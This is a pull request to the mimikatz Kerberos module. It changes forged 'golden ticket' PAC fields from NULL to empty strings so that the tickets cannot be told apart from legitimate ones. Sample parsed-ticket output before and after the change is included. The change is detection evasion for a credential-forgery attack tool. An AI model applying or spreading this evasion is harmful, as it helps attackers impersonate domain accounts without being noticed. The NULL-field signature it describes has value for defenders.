### PR TITLE
Use blank strings instead of NULL for fields in PKERB_VALIDATION_INFO

### DIFF
--- a/mimikatz/modules/kerberos/kuhl_m_kerberos_pac.c
+++ b/mimikatz/modules/kerberos/kuhl_m_kerberos_pac.c
@@ -146,6 +146,7 @@ BOOL kuhl_m_pac_validationInfo_to_CNAME_TINFO(PFILETIME authtime, LPCWSTR client
 PKERB_VALIDATION_INFO kuhl_m_pac_infoToValidationInfo(PFILETIME authtime, LPCWSTR username, LPCWSTR domainname, LPCWSTR LogonDomainName, PISID sid, ULONG rid, PGROUP_MEMBERSHIP groups, DWORD cbGroups, PKERB_SID_AND_ATTRIBUTES sids, DWORD cbSids)
 {
 	PKERB_VALIDATION_INFO validationInfo = NULL;
+	PCWSTR blankString = L"";
 	if(validationInfo = (PKERB_VALIDATION_INFO) LocalAlloc(LPTR, sizeof(KERB_VALIDATION_INFO)))
 	{
 		validationInfo->LogonTime = *authtime;
@@ -172,6 +173,13 @@ PKERB_VALIDATION_INFO kuhl_m_pac_infoToValidationInfo(PFILETIME authtime, LPCWST
 			validationInfo->UserFlags |= 0x20;
 		//if(validationInfo->ResourceGroupDomainSid && validationInfo->ResourceGroupIds && validationInfo->ResourceGroupCount)
 		//	validationInfo->UserFlags |= 0x200;
+
+		RtlInitUnicodeString(&validationInfo->FullName, blankString);
+		RtlInitUnicodeString(&validationInfo->LogonScript, blankString);
+		RtlInitUnicodeString(&validationInfo->LogonServer, blankString);
+		RtlInitUnicodeString(&validationInfo->ProfilePath, blankString);
+		RtlInitUnicodeString(&validationInfo->HomeDirectory, blankString);
+		RtlInitUnicodeString(&validationInfo->HomeDirectoryDrive, blankString);
 	}
 	return validationInfo;
 }


### PR DESCRIPTION
Research completed by using [this script](https://gist.github.com/xan7r/ca99181e3d45ee2042425f4f9181e614) exposed that when creating a golden ticket, numerous fields exist in the `_KERB_VALIDATION_INFO` struct that make it very easy to distinguish a ticket created by mimikatz vs. a ticket created legitimately. Using the script mentioned above, one such set of fields can be seen below.

**_Legitimate Ticket_**
```
    EffectiveName:                   u'brownee' 
    FullName:                        u'Adam Brown' 
    LogonScript:                     u'' 
    ProfilePath:                     u'' 
    HomeDirectory:                   u'' 
    HomeDirectoryDrive:              u''
```

**_Golden Ticket from Mimikatz_**
```
    EffectiveName:                   u'brownee' 
    FullName:                        NULL 
    LogonScript:                     NULL 
    ProfilePath:                     NULL 
    HomeDirectory:                   NULL 
    HomeDirectoryDrive:              NULL 
```

It appears that properly generated tickets are initialized with empty strings rather than `NULL`. This pull request populates the shown fields with empty strings. The result can be seen below.

**_Updated Golden Ticket from Mimikatz_**
```
    EffectiveName:                   u'brownee' 
    FullName:                        u'' 
    LogonScript:                     u'' 
    ProfilePath:                     u'' 
    HomeDirectory:                   u'' 
    HomeDirectoryDrive:              u'' 
```

This is a small change, but we think it is important. Please let me know if you have any questions or concerns. 